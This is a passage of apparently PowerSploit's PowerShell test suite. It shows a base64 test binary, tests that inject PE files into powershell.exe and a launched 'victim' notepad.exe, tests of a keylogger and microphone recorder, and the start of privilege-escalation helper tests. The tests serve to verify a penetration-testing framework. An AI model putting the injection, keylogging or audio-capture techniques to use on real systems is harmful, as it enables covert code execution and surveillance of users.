'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'\n\n\t$WideStrDllBytes32 = [Convert]::FromBase64String($Encoded32BitWStringDll)\n\t$StrDllBytes32 = [Convert]::FromBase64String($Encoded32BitStringDll)\n\t$VoidDllBytes32 = [Convert]::FromBase64String($Encoded32BitVoidDll)\n\t$WideStrDllBytes64 = [Convert]::FromBase64String($Encoded64BitWStringDll)\n\t$StrDllBytes64 = [Convert]::FromBase64String($Encoded64BitStringDll)\n\t$VoidDllBytes64 = [Convert]::FromBase64String($Encoded64BitVoidDll)\n\t$ExeBytes32 = [Convert]::FromBase64String($Encoded32BitExe)\n\t$ExeBytes64 = [Convert]::FromBase64String($Encoded64BitExe)\n\n\tif ([IntPtr]::Size -eq 4) {\n\t\t$PowerShell32bit = $True\n\t\t$WideStrDllBytes = $WideStrDllBytes32\n\t\t$StrDllBytes = $StrDllBytes32\n\t\t$VoidDllBytes = $VoidDllBytes32\n\t\t$ExeBytes = $ExeBytes32\n\t} else {\n\t\t$PowerShell32bit = $False\n\t\t$WideStrDllBytes = $WideStrDllBytes64\n\t\t$StrDllBytes = $StrDllBytes64\n\t\t$VoidDllBytes = $VoidDllBytes64\n\t\t$ExeBytes = $ExeBytes64\n\t}\n\n\tContext 'DLL loading' {\n\t\tIt 'should load a DLL (wchar_t*) in memory within powershell.exe and returns \"Hello, world!\"' {\n\t\t\t$Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType WString -DoNotZeroMZ\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result | Should Be 'Hello, world!'\n\t\t}\n\n\t\tIt 'should load a DLL (char*) in memory within powershell.exe and returns \"Hello, world!\"' {\n\t\t\t$Result = Invoke-ReflectivePEInjection -PEBytes $StrDllBytes -FuncReturnType String -DoNotZeroMZ\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result | Should Be 'Hello, world!'\n\t\t}\n\n\t\tIt 'should load a DLL (void) in memory within powershell.exe and writes \"Hello, world!\" to %TEMP%\\testoutput.txt' {\n\t\t\t$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'\n\t\t\tif (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }\n\n\t\t\tInvoke-ReflectivePEInjection -PEBytes $VoidDllBytes -FuncReturnType Void -DoNotZeroMZ\n\n\t\t\tStart-Sleep -Seconds 2\n\t\t\t$TestOutputPath | Should Exist\n\t\t\t$Result = Get-Content $TestOutputPath\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result | Should Be 'Hello, world!'\n\t\t}\n\n\t\tIt 'should load a DLL (void) in memory within notepad.exe and write \"Hello, world!\" to %TEMP%\\testoutput.txt' {\n\t\t\t$64BitOS = $False\n\t\t\tif ($Env:ProgramW6432) { $64BitOS = $True }\n\n\t\t\t# When launching notepad.exe, the bitness of the process needs to match that of powershell.exe\n\t\t\tif ($PowerShell32bit -and $64BitOS) {\n\t\t\t\t# 32-bit PowerShell on a 64-bit OS needs to launch Wow64 notepad\n\t\t\t\t$NotepadPath = \"$($Env:SystemRoot)\\SysWow64\\notepad.exe\"\n\t\t\t} else {\n\t\t\t\t$NotepadPath = \"$($Env:SystemRoot)\\System32\\notepad.exe\"\n\t\t\t}\n\n\t\t\t$NotepadProc = Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList $NotepadPath\n\n\t\t\tif ($NotepadProc.ReturnValue -ne 0) {\n\t\t\t\tthrow 'Could not start victim process: notepad.exe'\n\t\t\t} \n\n\t\t\t$VictimPID = $NotepadProc.ProcessId\n\n\t\t\t$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'\n\t\t\tif (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }\n\n\t\t\tInvoke-ReflectivePEInjection -PEBytes $VoidDllBytes -ProcId $VictimPID -DoNotZeroMZ\n\n\t\t\t$Result = Get-Content $TestOutputPath\n\n\t\t\tStart-Sleep -Seconds 2\n\n\t\t\tStop-Process -Id $VictimPID\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result | Should Be 'Hello, world!'\n\t\t}\n\n\t\tIt 'should not load a DLL in memory within powershell.exe when the bitness of powershell.exe and the DLL do not match.' {\n\t\t\tif ($PowerShell32bit) {\n\t\t\t\t$PEBytes = $WideStrDllBytes64\n\t\t\t} else {\n\t\t\t\t$PEBytes = $WideStrDllBytes32\n\t\t\t}\n\n\t\t\t# Attempt to load the wide string DLL in memory with a mismatched bitness\n\t\t\t{ Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -DoNotZeroMZ } | Should Throw\n\t\t}\n\n\t\tIt 'should not load a DLL in memory within powershell.exe when the return types do not match.' {\n\t\t\t# This DLL exports WStringFunc which means that -FunReturnType should be WString\n\t\t\t{ $Result = Invoke-ReflectivePEInjection -PEBytes $WideStrDllBytes -FuncReturnType String -DoNotZeroMZ } | Should Throw\n\t\t}\n\t}\n\n\tContext 'EXE Loading' {\n\t\t$TestOutputPath = Join-Path $Env:TEMP 'testoutput.txt'\n\n\t\tBeforeEach {\n\t\t\tif (Test-Path $TestOutputPath) { Remove-Item $TestOutputPath }\n\t\t}\n\n\t\tIt 'should load an EXE in memory within powershell.exe and write \"Hello, world!\" to %TEMP%\\testoutput.txt when provided no arguments' {\n\t\t\tInvoke-ReflectivePEInjection -PEBytes $ExeBytes -DoNotZeroMZ\n\t\t}\n\n\t\tIt 'should load an EXE in memory within powershell.exe and write \"Hello, world!\" to %TEMP%\\testoutput.txt when provided arguments' {\n\t\t\tInvoke-ReflectivePEInjection -PEBytes $ExeBytes -ExeArgs 'foo bar' -DoNotZeroMZ\n\t\t}\n\n\t\tAfterEach {\n\t\t\tStart-Sleep -Seconds 2\n\t\t\t$TestOutputPath | Should Exist\n\t\t\t$Result = Get-Content $TestOutputPath\n\n\t\t\t$Result | Should Not BeNullOrEmpty\n\t\t\t$Result.StartsWith('Hello, world!') | Should Be $True\n\t\t}\n\t}\n}"
  },
  {
    "path": "Tests/Exfiltration.tests.ps1",
    "content": "Set-StrictMode -Version Latest\n\n$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent\n$ModuleRoot = Resolve-Path \"$TestScriptRoot\\..\"\n$ModuleManifest = \"$ModuleRoot\\Exfiltration\\Exfiltration.psd1\"\n\nRemove-Module [E]xfiltration\nImport-Module $ModuleManifest -Force -ErrorAction Stop\n\nDescribe 'Get-Keystrokes' {\n    \n    if (Test-Path \"$($env:TEMP)\\key.log\") { Remove-Item -Force \"$($env:TEMP)\\key.log\" }\n    $WindowTitle = (Get-Process -Id $PID).MainWindowTitle\n    \n    $Shell = New-Object -ComObject wscript.shell\n    $Shell.AppActivate($WindowTitle)\n    \n    $KeyLogger = Get-Keystrokes -PassThru\n    Start-Sleep -Seconds 1\n\n    $Shell.SendKeys(\"Pester`b`b`b`b`b`b\")\n    $KeyLogger.Dispose()\n\n    It 'Should output to file' { Test-Path \"$($env:TEMP)\\key.log\" | Should Be $true }\n    \n    $KeyObjects = Get-Content -Path \"$($env:TEMP)\\key.log\" | ConvertFrom-Csv\n\n    It 'Should log keystrokes' {\n        $FileLength = (Get-Item \"$($env:TEMP)\\key.log\").Length\n        $FileLength | Should BeGreaterThan 14\n    }\n\n    It 'Should get foreground window title' {\n        $KeyObjects[0].WindowTitle | Should Be $WindowTitle\n    }\n\n    It 'Should log time of key press' {\n        $KeyTime = [DateTime]::Parse($KeyObjects[0].Time)\n        $KeyTime.GetType().Name | Should Be 'DateTime'\n    }\n\n    It 'Should stop logging after timeout' {\n        \n        $Timeout = 0.05\n        $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru\n        \n        Start-Sleep -Seconds 4\n\n        $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available'\n        $KeyLogger.Dispose()\n    }\n\n    Remove-Item -Force \"$($env:TEMP)\\key.log\"\n}\n\nDescribe \"Get-MicrophoneAudio\" {\n\n\t$RecordPath = \"$env:TEMP\\test_record.wav\"\n\t$RecordLen = 2\n\tContext 'Successful Recording' {\n\t\tBeforeEach { \n\t\t\t#Ensure the recording as been removed prior to testing\n\t\t\tRemove-Item -Path $RecordPath -ErrorAction SilentlyContinue\n\t\t}\n\n\t\tAfterEach {\n\t\t\t#Remove the recording after testing\n\t\t\tRemove-Item -Path $RecordPath -ErrorAction SilentlyContinue\n\t\t}\n\n\t\tIt 'should record audio from the microphone and save it to a specified path' {\n\t\t\t$result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen\n\t\t\t$result | Should Not BeNullOrEmpty\n\t\t\t$result.Length | Should BeGreaterThan 0\n\t\t}\n\n\t}\n\n\tContext 'Invalid Arguments' {\n\t\tIt 'should not allow invalid paths to be used' {\n\t\t\t{ Get-MicrophoneAudio -Path \"c:\\FAKEPATH\\yay.wav\" -Length RecordLen} | Should Throw\n\t\t}\n\t}\n\n}\n"
  },
  {
    "path": "Tests/PowerSploit.tests.ps1",
    "content": "Set-StrictMode -Version Latest\n\n$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent\n$ModuleRoot = Resolve-Path \"$TestScriptRoot\\..\"\n\nfilter Assert-NotLittleEndianUnicode {\n    [CmdletBinding()]\n    param (\n        [Parameter(Mandatory = $True,\n                   ValueFromPipelineByPropertyName = $True,\n                   ValueFromPipeline = $True)]\n        [Alias('FullName')]\n        [String[]]\n        $FilePath\n    )\n\n    $LittleEndianMarker = 48111 # 0xBBEF\n\n    Write-Verbose \"Current file: $FilePath\"\n    Write-Debug \"Current file: $FilePath\"\n\n    if ([System.IO.Directory]::Exists($FilePath)) {\n        Write-Debug \"File is a directory.\"\n        return\n    }\n\n    if (-not [System.IO.File]::Exists($FilePath)) {\n        Write-Debug \"File does not exist.\"\n        return\n    }\n\n    $FileBytes = Get-Content -TotalCount 3 -Encoding Byte -Path $FilePath\n\n    if ($FileBytes.Length -le 2) {\n        Write-Debug \"File must be at least 2 bytes in length.\"\n        return\n    }\n\n    if ([BitConverter]::ToUInt16($FileBytes, 0) -eq $LittleEndianMarker) {\n        Write-Debug \"File contains little endian unicode marker.\"\n        throw \"$_ is little-endian unicode encoded.\"\n    }\n}\n\nDescribe 'ASCII encoding of all scripts' {\n\tIt 'should not contain little-endian unicode encoded scripts or modules' {\n\t\t{ Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw\n\t}\n}"
  },
  {
    "path": "Tests/Privesc.tests.ps1",
    "content": "Set-StrictMode -Version Latest\n\n$TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent\n$ModuleRoot = Resolve-Path \"$TestScriptRoot\\..\"\n\n$ModuleManifest = \"$ModuleRoot\\Privesc\\Privesc.psd1\"\nRemove-Module [P]rivesc\nImport-Module $ModuleManifest -Force -ErrorAction Stop\n\n# import PowerUp.ps1 manually so we expose the helper functions for testing\n$PowerUpFile = \"$ModuleRoot\\Privesc\\PowerUp.ps1\"\nImport-Module $PowerUpFile -Force -ErrorAction Stop\n\n\n\nfunction Get-RandomName {\n    $r = 1..8 | ForEach-Object{Get-Random -max 26}\n    return ('abcdefghijklmnopqrstuvwxyz'[$r] -join '')\n}\n\nfunction Test-IsAdmin {\n    return ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] \"Administrator\")\n}\n\n\n########################################################\n#\n# PowerUp helper functions.\n#\n########################################################\n\nDescribe 'Get-ModifiablePath' {\n\n    It 'Should output a file Path, Permissions, and IdentityReference in results.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        try {\n            $Output = Get-ModifiablePath -Path $FilePath | Select-Object -First 1\n            \n            if ($Output.PSObject.Properties.Name -notcontains 'ModifiablePath') {\n                Throw \"Get-ModifiablePath result doesn't contain 'ModifiablePath' field.\"\n            }\n\n            if ($Output.PSObject.Properties.Name -notcontains 'Permissions') {\n                Throw \"Get-ModifiablePath result doesn't contain 'Permissions' field.\"\n            }\n\n            if ($Output.PSObject.Properties.Name -notcontains 'IdentityReference') {\n                Throw \"Get-ModifiablePath result doesn't contain 'IdentityReference' field.\"\n            }\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n\n    It 'Should output the correct file path in results.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        try {\n            $Output = Get-ModifiablePath -Path $FilePath | Select-Object -First 1\n            $Output.ModifiablePath | Should Be $FilePath\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n\n    It 'Should return the proper permission set.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        try {\n            $Output = Get-ModifiablePath -Path $FilePath | Select-Object -First 1\n\n            if ($Output.Permissions -notcontains 'WriteData/AddFile') {\n                Throw \"Get-ModifiablePath result doesn't contain the proper permission set.\"\n            }\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n\n    It 'Should extract a modifiable file specified as an argument in a command string.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        $CmdPath = \"'C:\\Windows\\System32\\nonexistent.exe' -i '$FilePath'\"\n        \n        try {\n            $Output = Get-ModifiablePath -Path $FilePath | Select-Object -First 1\n            $Output.ModifiablePath | Should Be $FilePath\n        }\n        finally {\n            $Null = Remove-Item -Path $FilePath -Force -ErrorAction SilentlyContinue\n        }\n    }\n\n    It 'Should accept a path string over the pipeline.' {\n        $FilePath = \"$(Get-Location)\\$([IO.Path]::GetRandomFileName())\"\n        $Null | Out-File -FilePath $FilePath -Force\n\n        try {\n            $Output = $FilePath | Get-ModifiablePath\n            $Output | Should Not BeNullOrEmpty\n        }\n        finally {\n            $Null = Remove-Item 